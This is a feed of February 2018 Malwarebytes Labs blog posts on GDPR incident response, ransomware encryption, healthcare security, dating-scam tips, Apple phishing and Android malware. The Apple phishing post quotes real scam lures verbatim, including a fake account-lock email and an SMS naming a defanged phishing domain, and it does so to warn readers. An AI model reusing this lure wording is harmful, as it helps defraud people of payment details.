Techie Feeds

How to build an incident response program: GDPR guidelines

Malwarebytes - Wed, 02/21/2018 - 09:00

In today’s computing world, it is not a matter of “if” an organization will get compromised, but “when.” That’s why, in addition to the European Union’s General Data Protection Regulation (GDPR) going into effect this May, many organizations need to have a robust incident response program to ensure the safety of their customers’ and employees’ data.

Incident response programs need to cover a wide array of regulatory and compliance requirements, technical details, and workflows to ensure companies can adequately and quickly respond to a security incident in their environment. Because of this complexity, I’m going to break the topic of “building an incident response program” into multiple blog posts.

In this first article, I will outline some of the regulatory requirements documented in the GDPR. However, while I address GDPR requirements, I’m also covering some of the basic and underlying tenants of a robust incident response program—one that can also align with other state and country regulations worldwide.

Regulatory requirements

At the forefront of many security professionals’ mind is May 25, 2018: the date when GDPR takes effect. Companies who do business in the European Union (EU) or have data on citizens of the EU must be compliant with the GDPR requirements by this time.

While there are many other security standards that businesses must meet, such as the Payment Card Industry Data Security Standards (PCI-DSS) for organizations that handle credit card information or the Sarbanes-Oxley Act (SOX) for publicly traded companies, it appears that GDPR has a significantly more stringent set of regulations and a much steeper penalty for non-compliance (up to 4 percent of annual global turnover or 20M Euro, whichever is greater).

Further, there are many other requirements within GDPR that are outside of incident response—so please consult your legal team or an outside expert to ensure all GDPR requirements are being addressed within your company or organization.

From the GDPR website, under Data Subject Rights:

Under the GDPR, breach notification will become mandatory in all member states where a data breach is likely to “result in a risk for the rights and freedoms of individuals”. This must be done within 72 hours of first having become aware of the breach. Data processors will also be required to notify their customers, the controllers, “without undue delay” after first becoming aware of a data breach. 

While the above statement only indicates the requirement for notification within 72 hours of identifying a data breach and does not say organizations must have an incident response program, it is evident that in order to meet the 72-hour notification requirement, an organization will need to be in a position to quickly detect a breach within their networks, systems, or applications.

However, the GDPR does specify requirements for incident or breach response directly. Here are some of its high-level GDPR requirements:

Rapid declaration: Organizations must report breaches to the “supervisory authority” within 72 hours of becoming aware of them.

Formal incident/breach response policy and plan: Organizations that are disorganized or “fly by the seat of their pants” during an incident are at a much higher risk of not having a complete or thorough response and will likely incur penalties outlined in the GDPR. Developing an incident response program—creating policies and procedures, and ensuring everyone is aware of the program—will go a long way in establishing a base from which to work when an incident or breach occurs.

Data inventory: It becomes critical to know where an individual’s data is being stored so the incident response team can quickly know the potential impact of a security event on a system or application.

Impacted individual notification: Having an accurate inventory of what data is being stored will help with any potential individual notifications in the event of a breach. Know who is impacted and have a process to notify them in the event of a breach. The communication with individuals must describe the nature of the breach and recommendations to mitigate potential adverse effects.

Communication plans: Some communications requirements have been identified above; however, internal communication between impacted departments and groups is also critical to ensure a smooth response to an incident or breach. It is also vital that the communication plan identify who is authorized to talk to external entities, such as the press or law enforcement.

Incident response structure: One key decision an organization needs to make is: Should we build a program internally or utilize a Managed Security Service Provider (MSSP) for detection and/or response? If using an MSSP, organizations should routinely test it to ensure effectiveness and timely notification, as it is ultimately up to the organization to comply with regulatory requirements and timeframes.

Detection: The ability to detect an attack or security event has always been critical to an organization, but now a failure to detect an attack may be grounds for GDPR penalties. If an organization can detect and take action against an adversary within the network, the organization could prevent or reduce GDPR penalties, especially if an attack is stopped prior to exposure.

Incident/breach response: Within the response framework, the ability to quickly analyze what the attackers may have accessed or copied will go a long way in minimizing the potential impact to the organization and, most importantly, to the individuals that were impacted.

Effective response: A documented and approved program is an important step; however, if staff are not aware of the program, trained on the process documentation, and the program is not routinely tested, the response will not be effective. The Incident Response Program must be regularly audited and communicated to staff to ensure its effectiveness and completeness in the event of a breach.

While I have a pretty good grasp on how GDPR will impact Information Security Operations and Governance groups, I recommend you consult with your Legal and Privacy Teams prior to implementing or dismissing any controls that could be related to GDPR and, for that matter, to other regulatory requirements.

Next up: creating the framework of an incident response program and team.

The post How to build an incident response program: GDPR guidelines appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Encryption 101: a malware analyst’s primer

Malwarebytes - Tue, 02/20/2018 - 21:53

While most in the security industry know what encryption is, many lack a basic understanding of how it is used in malware—especially ransomware. Because of this, we thought it would be beneficial to do an introductory primer on encryption mechanisms and how they are exploited for malicious purposes.

We will start with a introduction to encryption in general, and follow up with the main methods used to encrypt files used by ransomware. In part two of this blog series, we’ll use a recent ransomware variant detected by Malwarebytes as Ransom.ShiOne to highlight the key weaknesses in encryption to look out for when trying to decrypt files.

What is encryption?

In the simplest of terms, encryption is the process of encoding information so that only authorized parties can access it, and those who are not authorized cannot. In computing, encryption is the method by which data is converted from a readable format (plaintext) to an encoded one (ciphertext) that can only be decoded by another entity if they have access to a decryption key. While encryption was long used by the military to facilitate secret communication, today it is used to secure data in transit and in storage, as well as to authenticate and verify identities.

Unfortunately, encryption is also used for malicious purposes, as is the case with ransomware.

Evaluating the encryption

If a malware analyst wants to effectively evaluate a malicious encryption, he needs to observe the encryption on the machine that is creating or receiving the encrypted data. If you have access to any process running before it has performed the encryption phase, you will typically have enough data to be able to decrypt or to simply view the natively decrypted data.

Being the observer is the only chance you have to recover files without needing to crack the encryption. However, for a ransomware attack, being an observer usually isn’t possible. After the malware finishes running and sends off the encryption keys, it is too late. When the malware shuts down, you can no longer be the observer. Now you must rely on analysis and hope there is a flaw in the encryption.

What exactly does it mean to be an observer of decryption and encryption? Someone once asked me:

Why do malware authors not always encrypt communication to a C2 server?

My answer to him was that malware is public, in that it can run on random victim systems throughout the world. As reverse engineers, we always have access to the binary and are able to inspect the software on the lowest, most detailed level. A secure communication is meaningless at this level because we will be looking at the system before encryption and after decryption.

An SSL or https communication received on the client side (victim computer) will be decrypted in memory for the data to be processed in whichever way the malware intends. At this point, we will always be able to inspect memory and pull the decrypted communication out in its raw form, so it really doesn’t hide anything when a server sends encrypted data down to a malware that is being analyzed.

This same logic applies to many use cases in ransomware and file encryption. If we are looking at a ransomware and it is generating its encryption keys locally, we can observe the keys in memory immediately after creation, save those out, and use those keys from memory to decrypt files after the ransomware runs, with a requirement that we are able to determine the algorithm used for the encryption.

If during the process of ransomware running and encrypting files the user dumped its memory, he has a chance of being an observer, and a likely possibility to recover files. This is unfortunately not a typical scenario, as a victim’s first instinct is not to create a memory dump while continuing to allow the process to run. But for a theoretical example, it technically can work.

Ransomware algorithms

Over the years, we have come across many algorithms used to hold victims’ files hostage. The most common of these involve the use of standard, public, and proven algorithms for asymmetric encryption. But occasionally we see custom encryption (which is likely weaker) or even simple, obfuscated methods to holds files hostage.

Years ago, when I would come across ransom malware, it would typically use alternative methods for holding the victim computer as ransom, rather than encrypting all files on the drive. I have seen everything from file hiding and custom crypto to Master Boot Record (MBR) rewriting.

File obfuscation

In the case of file obfuscation, the ransomware simply would move or hide targeted files—documents and anything else it believes the victim would care about—and ask for a ransom to recover the files. In this case, recovery is trivial. You can simply reverse the code that is performing the hiding and be able to reverse the actions it took.

Here’s an example: A fake pop-up claims your hard drive is corrupt, and asks you to call and pay for “support” to recover the files. On this particular malware I analyzed, it displayed a pop-up window (shown below), and simply moved all the documents and desktop files into a new folder in a hidden location. The fix for this was looking at the code to see which files it moved and to what location.

Custom cryptos

When dealing with custom cryptos, typically a file is passed through an algorithm that modifies the file in a standard way. A simple example would be every byte in the file being XORed by a constant or cycling set of bytes. In these cases, you can almost think of the algorithm itself as the key. If you can reverse the algorithm,  you can figure out exactly how it is modifying or encrypting the file. Then, simply reversing the steps will give you the original file. In contrast, when faced with asymmetric cryptography, the algorithm itself will not provide you with enough to be able to decrypt a file.

MBR rewriting

In the third scenario, the MBR would be rewritten with a small program that requires a password or serial number for access. The malware would force a reboot of the computer, and before the system would load Windows, it would first prompt the user with instructions on how to pay the ransom to receive a passcode. In this scenario, reversing the serial or password validation algorithm within the boot record (essentially creating a keyGen), would provide you with the ability to know which password would allow access. Alternatively, rewriting that portion of the hard drive with the factory boot record would also disable the lock on your computer.

Aside from reversing the algorithm, the only difficulty here would be knowing how to rewrite the MBR yourself in order to restore the original code to this section of the drive.

Below is an example of an MBR locker. Notice that no ID is asked of you, which means there is nothing unique to the specific blockage, and a static unlock code is likely to be needed.

Now, these three alternative methods are not quite using encryption in the standard sense of the word, but I am mentioning them here because it shows that a custom written, closed-source obfuscation is sometimes trivial to break. The reason most criminals use standardized, public, open-source encryption algorithms to encrypt files for ransom is that they are tested and reliably secure. That means you can know every detail about the encryption algorithm but it won’t matter—you can’t decrypt the encrypt by any method other than having the encryption key.

Why is this important? Encryption using standard, open-source code is built off of the relationship between the encryption keys. The algorithms used simply derive two separate keys that are related. This concept is called asymmetric cryptography, and it is the method of encryption that the vast majority of ransomware authors use today.

Asymmetric cryptography basics

Asymmetric encryption involves generating two keys that are completely different; however, they share a relationship. One key (the public key) is used to encrypt the data into ciphertext, while its companion (the private key) is used to decrypt the ciphertext into the original plaintext. It is called asymmetric because the public key, although it was used to encrypt, cannot be used to decrypt. The private key is required to decrypt.

In encrypted communication that uses asymmetric cryptography, two keys are generated locally—the public key and the private key. The public key is available for the whole word to see. If someone wants to send a message that only one person (Bob) could read, they would encrypt the message using Bob’s public key. Because his public key cannot be used to decrypt the message, it is completely safe. Using his offline, private key, Bob would be able to decrypt the message and see the original text.

Here a few visualizations to help you understand.

This is the same method used by ransomware authors for file encryption. A basic run-through of an encryption process goes as follows:

An array of random numbers is generated. This series of bytes will be used before the first round of the file encryption. Typically, a mathematical series of operations is performed on the public key using this random initialization to, in effect, create a sub-key derived from the initial key. This sub-key will be now used in order to actually encrypt the file data. During the first phase of the encryption process, a second random array is generated, which will be used as an initialization vector (IV). Every stage following will use the output of the previous stage as its new IV.

A random number is first used as the IV, then the generated ciphertext is used for the next round of encryption.

The generation of the keys themselves also relies on a random number generator. So as you can imagine, having a solid and “as random as possible” generator is extremely important.

Ransomware file encryption

Modern ransomware typically does one of a couple things: Either it dynamically generates the keys locally and sends them up to the C2 server attached to the client ID, or the keys are generated by the author and are preloaded into the ransomware itself.

The latter, although arguably more secure, requires a lot of overhead in generating a completely new binary for each victim, or at least distributing a batch of identical malware using the same key in each campaign version. The trade-off here is that although the key generation cannot be observed directly and inspected for weaknesses by an analyst, two victims will actually have the same encryption keys. So if one person pays the ransom and shares his keys, everyone else impacted by that campaign version can decrypt their files for free. This is a weakness via leaked keys.

Now, if the keys were dynamically generated, it allows the slim potential usage of a memory dump for file recovery, and also the slim possibility that an analyst can find a hole in the encryption. (The memory dump is not that big of a problem for the malware author because, as we said earlier, it is rare when a user knows that he should create a dump). However, the benefit to this local key generation method is that the malware is fully dynamic, and no two people will share the same key. Both methods have their share of weaknesses and strengths.

Modern ransomware authors typically use one of these forms of standardized encryption—AES, RSA, Blowfish, etc.—to try and make the victim’s files unrecoverable without the author providing the decryption key. The reason I say “try” is because there are many cases where these good algorithms are being misused (which will allow the same key to be generated twice). In addition, the transfer and generation of keys can be intercepted.

Asymmetric cryptography encryption may be near impossible to crack, but that doesn’t mean it can’t be broken. To learn how, tune in for our next blog, which uses the ShiOne ransomware to demonstrate how malware analysts can look for weaknesses in encryption.

The post Encryption 101: a malware analyst’s primer appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 12 – February 18)

Malwarebytes - Mon, 02/19/2018 - 16:55

Last week on Malwarebytes Labs, we looked at a huge Android cryptomining campaign, malicious apps on Google Play, and some Apple scams doing the rounds. We also explored the world of healthcare security, and dived into the land of scammy Valentine’s Day tricks and cheats.

Other news

Stay safe, everyone!

The post A week in security (February 12 – February 18) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Physician, protect thyself: healthcare cybersecurity circling the drain

Malwarebytes - Thu, 02/15/2018 - 16:00

No one knows you better than you do. But thanks to technology advances and the continued digitization of healthcare data accumulation and sharing processes, we can also honestly say the same about your healthcare provider.

Indeed, every time we get in touch with a health professional, data is recorded (either on paper or electronically), entered into a computer, and then stored in a massive database for record-keeping, analysis, and retrieval.

This digital warehouse of electronic health records (EHR), which contain medical history, diagnoses, and medications (including billing data, insurance, and other personally identifiable information), is what cybercriminals are after. For healthcare facilities in the business of research, intellectual property is their primary asset at risk. Such a trove in the wrong hands could mean nothing good.

A horripilation of dread

Dismally, where healthcare excels in medical breakthroughs and advances in therapy, it lacks in cybersecurity preparedness and adoption of privacy practices. Studies from independent organizations consistently reveal that the continuous use of legacy systems—those outdated programs and computers running Windows XP—scarce resources allocated for cybersecurity, and an apparent shortage of IT professionals top the list of problems the healthcare industry faces. And this is just the tip of the iceberg.

Technological advancements that make reviewing, sharing, and storing digital information possible present other significant challenges that need addressing. They include:

  • The easy accessibility of patient records
  • The automation of clinical systems (e.g. the ordering of prescription medicine for patients)
  • The introduction of external media or third-party devices to the hospital network
  • The emergence of mobile health apps
  • The increasing adoption of BYOD
  • The overall lack of awareness of risks to patient health data among hospital and clinic staff

Below, we take a look at the cybersecurity risks that each of these challenges present.

Easy accessibility of patient records

Public-facing healthcare facilities like hospitals and clinics have embraced the move from paper records to digital records. In so doing, they gather and store patient data into databases open to anyone with access to them, whether it be a doctor 20 miles from the building or a nurse at the reception desk.

The digitization of patient health records also made the process of sharing information across multiple healthcare facilities easier. Patients, too, are given access to their health records. Because of this, the likelihood of exposure to threats increases.

All that storing, retrieving, and sharing leaves the door open to malicious actors who can just as easily infiltrate the database to steal information and sell it on the black market. How valuable is patient data? Very valuable. Medicare ID numbers belonging to 10 patients, for example, are being sold for 22 Bitcoins, which amounts to more than $200,00 as of this writing. EHRs carries a hefty price tag because this is the kind of data that criminals can use and reuse for decades. And unlike credit card data, medical records cannot be altered or canceled once used in fraud.

Read: Think tank summarizes what happens to healthcare records after breach

Automation of hospital and clinic systems

Removing redundant and tedious tasks from healthcare professionals’ workday is a sound business move. It increases productivity, saves money, and improves the patient experience. However, as much good as automation has brought the industry, the implementation of its systems may have been carried out without cybersecurity or privacy in mind.

Those who quickly went about deploying automation for services like refilling prescriptions or making appointments might have medical devices and web-facing computers in the same network when they should be separate, for example. When medical devices are networked on the Internet and not secured, that leaves the door open for threat actors to exploit.

External media or third-party devices

Although the use of unencrypted external media and portable devices is against HIPPA (Health Insurance Portability and Accountability Act of 1996) standards, staff and third-party contractors continue to introduce such devices to computer systems connected to the hospital network. There have also been instances where patients have brought their medical records in via external media for doctors to review.

Two possible ends could come from this: portable media and devices might get stolen or misplaced, resulting in a security breach, and/0r malware might be introduced to the network. Ideally, both ends should be avoided at all cost.

Mobile health apps

We’re talking about mobile health, or mHealth, apps used by patients and medical professionals alike. These apps collect data from whoever uses them, and if doctors have access to this data, they can readily provide feedback or advise. Unfortunately, there is no such thing as a “one app that rules them all.” There are thousands of them out there in the market, believe it or not. And each one of them needs to be secured, else risk all those data getting leaked.

Bring Your Own Device (BYOD)

In 2012, Aruba Networks published the results of their survey, revealing that 85 percent of healthcare staff and professionals support the use of personal mobile devices, such as smartphones, laptops, and tablets, at work. Some say this trend is a natural fit for the industry as doctors and nurses are frequently on the move.

Being able to access records on the fly and sharing them with colleagues increases collaboration and productivity among healthcare staff. However, mobile devices owned by hospital staff and professionals are liable to theft. If they are not encrypted, it’s easy enough for the thief to retrieve, make use of, or sell the EHR stored in them.

Some hospitals and clinics also allow patients and visitors to connect to the facility’s Internet. This results in both patient and staff member BYOD devices overwhelming the bandwidth. On top of this, no one is really sure if such devices are secure enough, if at all. If a potentially infected device is introduced to the network, malware could take residence in the server or spread to other devices connected to the network.

Read: BYOD, why don’t you?


Lack of cybersecurity awareness

Lastly, healthcare staff is generally unaware of threats to patient data and are poorly prepared to identify attack types. This is probably why they may appear negligent in handling email, mobile devices, and hospital records. As we have already established before, cybersecurity issues are not just something that IT staff should scramble to address. Everyone, including nurses and doctors, has a responsibility to uphold when it comes to protecting patient data and securing hospital resources from external threats.

Sadly, there’s no panacea in sight

Unfortunately, there’s no magic bullet to address the myriad of challenges born from an environment this complex. In fact, addressing problems and risks surrounding something this important shouldn’t be rushed. People’s lives, after all, are at stake here, too. Although an overhaul may be needed to completely turn things around for the healthcare industry, this still takes a considerable amount of time to implement. And even if it has been completed, continuous improvement must naturally follow.

The good news is that healthcare facilities, regardless of size, don’t have to wait for a major revamp to happen before they can address the current dilemmas plaguing their industry. In part 2 of this post, we’ll discuss steps healthcare organizations can take to stay secure—beginning with awareness and education campaigns.

Until then, be well and stay safe!

The post Physician, protect thyself: healthcare cybersecurity circling the drain appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Online security tips for Valentine’s Day: how to beat the cheats

Malwarebytes - Wed, 02/14/2018 - 17:07

Valentine’s Day is upon us once more, and so are lots of dating-friendly security tips. Read on and secure your profile, alongside (one hopes) the love of your life.

1. Not so hot singles in your area

Many dating apps have geotagging enabled, regardless of whether you created your profile on a website or through the app itself. Some dating sites base the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile.

Get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about which thing does what, so if in doubt, disable a particular feature until you can be 100 percent sure. As a side note, ensure you don’t have geotagging enabled on any photographs you upload. If in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.

You’ll find some additional practical advice in terms of real world security on the Selfie Security blog we posted a while back. You should pay particular attention to not including location specific items in your photograph(s), such as bills with your address on them. Of course, if you want to enable geotagging then go ahead—just be mindful of the issues that could arise. The easier you are to find, the easier it is for that one terrible date you had to hang around your home, workplace, or just generally trail around familiar locations and become a major nuisance. We see many cases of stalking due to jilted hangers on from dating apps—don’t fall into this trap.

If stalking does happen to you, go to your local police department and let them know what’s happening. Depending on how much information the other person has, it may already be too late to go on blackout, but you can at least let those in authority know that somebody is pestering you.

2. Money thieves in your area

Scammers setting up fake profiles then asking for money is astonishingly common, and it’s all to easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates—or just lazily cut and paste Bot spam to reuse for their own purposes—and fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If Steven J. Fakename is posting identical romantic overtures on six different sites, you can be sure it’s time to move along.

With regard to common scam angles, watch out for anything related to:

  • Sick relatives
  • Medical emergencies
  • Lost overseas and need a plane ticket
  • Lost passport and need a visa/replacement passport
  • Wallet stolen and no funds available
  • Coming to visit, but there’s a last minute ticket price hike and I need your help

On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.

That’s a criminal offence, and you really don’t want to be doing any of those.

3. My other profile is also in your area

Be cautious around links sent your way that direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try and remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started with can’t hope to contain. That’s been a staple attack on social media sites for many a year, but it works with dating too.

If someone sends you shortened URLs, you can usually expand them to see where they end up. If you’re still not sure, try googling the link. If still nothing comes up to allow you to make an informed decision, you should just ignore whatever you’ve been sent—it isn’t worth the risk. You’ll probably want to block and report the sender while you’re at it.

4. Personal information in your area

Don’t put your real name, age, or location in your profile, email, or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service—not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too. Of course, the less personal information you put on a dating profile, the more likely it is that potential suitors may simply move on. As with everything, the decision is yours.

5. Bots in your area

If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information.

Don’t do it. If in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.

Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.

Bot accounts probably won’t have a realistic looking bio, or have links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it might be. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots. The bottom line is that nobody is going to start sending you random messages that you’re their hero and can we get married in 10 minutes please, so approach any and all conversations with a healthy dose of skepticism from the outset.

6. Dubious pics in your area

Be wary of people asking for intimate photographs and/or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.

Put simply: don’t do it. Again.

Even with these precautions in place, problematic pieces of tech, such as the recent Deepfakes furore ensures that anyone placing even a few dozen images or video online could end up in a (fake) pornographic movie. Given that people tend to place many, many photos of themselves in their best light on dating pages, along with the occasional movie clip, it might be an idea to at least roll back the volume of photos you have of yourself online.

Hopefully, the above will help to keep you out of trouble while swiping left, right, up, and quite possibly down. Here’s to a safe online Valentine’s Day experience for everybody.

The post Online security tips for Valentine’s Day: how to beat the cheats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Panic attack: Apple scams apply pressure

Malwarebytes - Tue, 02/13/2018 - 18:31

We’ve seen a number of Apple-related phishes in circulation over the last few days. While most of them already lead to deactivated phishing sites, we thought it was worth highlighting some of the tricks being used to bait people into handing over payment details at the moment.

Fake receipt emails

First up, a number of fake “receipt” emails ranging in date from February 2–6. While the content of some of the emails varies slightly, most of them use a subject line similar to the below:

[ New Statement ] Your receipt from Apple [ 02 February 2018 ]

In the cases we’ve seen, the mails claim to be receipts for a payment of $9.99 made out to, er, Mr. Edward Snowden. Apparently, privacy campaigns and 2 terabyte storage plans go together nicely.


Click to enlarge

The general rule of thumb is to try and be as inconspicuous as possible, so we’re not really sure why the scammers went with one of the most well-known privacy advocates on the planet to fill in the personal information box. Not only that, but they used a randomly-grabbed address from a property website sporting nine bedrooms and four bathrooms.

Maybe the plan is to hit the potential victim with something so utterly ludicrous, that they’ve already clicked the link before they’ve had time to think about it. For a lot of people, simply seeing a “Thanks for the order of this thing that costs you money” would be enough to have panic set in.

The good news for potential clickers is, the site the scammers are trying to bounce through is already wise to the scam and has effectively killed the one-way street to the phish page.

Click to enlarge

The phish link itself is also offline, so we can’t show you what may lay in wait. But we can confirm people won’t be losing money to this one anytime soon.

Someone else logged in

Elsewhere, we have a “Reminder” notification that someone else is logging in on your Apple account with an iPod in Monaco.

Click to Enlarge

The email reads as follows:

[Reminder] [Notification Update] Statement new log-in your Apple account with other device Fοuг уοuг ѕаfеtу, уοuг Αррlе ID hаѕ Ьееn lοсκеd Ьесаuѕе wе fοund ѕοmе ѕuѕрісіοuѕ асtіνіtу οn уοuг ассοunt. Ѕοmеοnе ассеѕѕіng уοuг ассοunt аnd mаκе ѕοmе сhаngе οn уοuг ассοunt іnfοгmаtіοn. This the details :
Country : Monaco
IP Address :
Date and Time : 13:09, 06 Feb 2018
OS : iPod
Browser : Safari If you did not make these action or you believe an unauthorized person has accessed your account, you should login to your account as soon as possible to verify your information.

Apart from the lazy typos (“Four your safety”) and awful sentence structure, they also make use of some Cyrillic characters in a likely attempt to bypass Beyesian filtering. While the destination site was offline again, it’s worth noting that all of the examples tried to send potential victims to HTTPs websites, instead of the plain old HTTP landing page. All phishers now want to look as “secure” as they possibly can—anything to help pull the wool over your eyes.

Always worth repeating: Just because a website is HTTPs, does not mean it is a legitimate website. Phish pages can lurk anywhere, no matter what security the page you’re on happens to be touting.

Apple care scare

There’s also some dubious texts going around claiming to be from Apple Care:

It reads as follows:

Final Notification Your Apple ID is due to expire today. Prevent this by confirming your Apple ID at appleid-revise(dot)com Apple Inc

As you can see, there’s a big push to apply pressure to potential victims, and everything falls somewhere between the two extremes of “Payment made, quick do something!” and “So, your account is going to be terminated.” While we’re happy to say this is another one that came to our attention already DOA, even as texts were going out, the sad truth is that for every site taken down there are many more happily accepting credit card details and personal information.

Fake app purchases

We’ve also seen some fake app purchases, and this one rather spookily has an order number attached that was actually of some relevance to the recipient.

Be aware of Apple Phishing email! (See pic) I checked my payment source, & called Apple. They DO NOT have a link in the receipt emails. The order ID was a valid one from a purchase 2 months ago. (Not this purchase) #TeamEmmmmsie #TUGfam #MGC #AppleSupport

— Rick92647 [TeEm] [TugFam] [MGC] (@Rick92647) February 5, 2018

While one hopes this is just some horrible coincidence, it could just as easily have prompted the above individual to start visiting rogue links—and that’s all it really takes. Just one fragment of information from an otherwise garbled email missive could be enough to cost someone a small fortune—or even worse, a very large one.

If you’re worried about the pushy tone of a supposed Apple missive, contact them directly to check its validity, and wander over to their help page for more information on securing your Apple account. These are some of the most common scams around, and for as long as Apple IDs are tied to valuable purchases and personal information, criminals will continue target these accounts.

The post Panic attack: Apple scams apply pressure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Kotlin-based malicious apps penetrate Google market

Malwarebytes - Tue, 02/13/2018 - 16:00

An open-source programming language, Kotlin is a fully-supported official programming language for Android. Google boasts that Kotlin contains safety features in order to make apps “healthy by default.” Many apps are already built with Kotlin, from the hottest startups to Fortune 500 companies. (Twitter, Uber, Pinterest)

Concise while being expressive, Kotlin reduces the amount of boilerplate code needed to create an app—which makes it much safer. However, as revealed by Trend Micro researchers, the first samples of Android malware created using Kotlin were found on Google Play. Introducing: Swift Cleaner, a utility tool built with Kotlin that claims to clean and optimize Android devices.

This malicious app is capable of remote command execution, can steal personal information, carry out click fraud, and sign users up to premium SMS subscription services without their permission. So much for safe.

Analyze this

Subsequently, after launching Swift Cleaner, the first thing the malware does is call PspManager.initSDK, check the phone number, and send an SMS message to the particular number that is given by the C&C server. The app initiates this to check for a SIM card presence and if mobile carrier services are available.

Upon server interaction, the malicious part of the app launches URL forwarding and click fraud activities. Click fraud is an illegal practice that occurs when individuals click on a website’s advertisements (either banner ads or paid text links) to increase the payable number of clicks to the advertiser. In our case, the app clicks on a URL, which leads you to a survey. At the end of the survey, you are given an opportunity to get some free services if you click on the claim link. By clicking the button, you will then be redirected to another possibly malicious website.

Meanwhile, Swift Cleaner collects personal information from the infected mobile device, such as the International Mobile Equipment Identity (IMEI), International Mobile Subscriber Identity (IMSI), and information about the SIM card. The stolen information is then encrypted and sent to the remote Command and Control (C&C) server.

There are services that run in the background in order to communicate with a C&C server. Swift Cleaner compromises one of these services: the Wireless Application Protocol (WAP). WAP is a technical standard for accessing information over a mobile wireless network.

The app is using WAP in conjunction with JavaScript in order to bolt on CAPTCHA bypass functionality, using mobile data and analyzing the image base64 code. CAPTCHA images are parsed and cracked, and the image data will later be uploaded to the C&C server. This data is needed to train the neural network. Later on, all the image samples will be useful for finding the best match for each character of the new upcoming CAPTCHA.

Premium SMS service

The Swift Cleaner malware also uploads information about the user’s service provider along with login information and similar sensitive data to the C&C server. This can automatically sign users up for a premium SMS service, which will cost money.

Premium rate SMS is a way of mobile billing where user pays for a premium service by either receiving or sending a message. There are two ways this billing service works:

  1. Mobile Originated (MO): where the mobile user pays to send a message (used for once-off services, such as competitions)
  2. Mobile Terminated (MT): where the mobile user pays to receive a message (used for subscription services)

Our example app uses the premium SMS MO service, and redirects users to webpages where they can select to send a message.

Neverending story

As of now, Google has removed the fake Swift Cleaner apps carrying this new malware from the Play Store. However, even if Google states that their protection is on a high level, there appears to be no fail-proof way to stop malware from entering the Play store. By using a quality mobile anti-malware scanner as second layer of protection, you can stay safe even when Google Play Protect fails. We (as always) recommend Malwarebytes for Android. Stay safe out there!

The post Kotlin-based malicious apps penetrate Google market appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 5 – February 11)

Malwarebytes - Mon, 02/12/2018 - 17:00

Last week on Malwarebytes Labs, we featured a new Flash Player zero-day that has been found in recent targeted attacks. And we talked about a new trick to cripple browsers that came out of the hat of tech support scammers.

We also covered several methods of stealing cryptocurrencies, including one for the Mac that wasn’t as new as it seemed, one for Android that poses as hack apps, and yet another abusing the fact that Deepfakes content was banned from most major networks. We even threw in an overview of several major cryptocurrency related thefts.

For Safer Internet Day 2018, we provided you with some fast and free tools to make your Internet experience safer and more private using ad blockers and anti-trackers.

Other news
  • Security researcher Scott Helme reported that thousands of US and UK government sites were running a compromised BrowserAloud plugin, making visitors mine for the Monero cryptocurrency. (Source: Sky News)
  • Lenovo warned customers about two critical Broadcom (Wifi) vulnerabilities that impact 25 models of its popular ThinkPad brand. (Source: ThreatPost)
  • Research shows that LiteCoin will be the next dominating cryptocurrency on the Dark Web, and not Monero as expected. (Source: Recorded Future)
  • A free decryption tool was released for Cryakl ransomware by Belgian Federal Police together with Kaspersky Lab. (Source: Bleeping Computer)
  • The Russian Research Institute of Experimental Physics was found to be using their nuclear supercomputer for cryptomining. (Source: Naked Security)
  • Researchers have identified a new strain of point-of-sale (PoS) malware that impersonates a LogMeIn service pack to steal credit card data via a DNS server. (Source: Tripwire)
  • The US Justice Department announced charges on Wednesday against three dozen individuals thought to be key members of ‘Infraud,” a long-running cybercrime forum that federal prosecutors say cost consumers more than half a billion dollars. (Source: Krebs on Security)
  • Working with Fujitsu, Microsoft is further embracing biometric technology with the implementation of a palm-vein authentication system that will be supported by Windows 10 Pro. (Source: CBR online)
  • Key iPhone source code gets posted online that could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. (Source: Motherboard)
  • VMware has advised on how to mitigate the Meltdown and Spectre chip design flaws in several of its products. (Source: The Register)

Stay safe, everyone!

The post A week in security (February 5 – February 11) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Drive-by cryptomining campaign targets millions of Android users

Malwarebytes - Mon, 02/12/2018 - 14:00

Malvertising and online fraud through forced redirects and Trojanized apps—to cite the two most common examples—are increasingly plaguing Android users. In many cases, this is made worse by the fact that people often don’t use web filtering or security applications on their mobile devices.

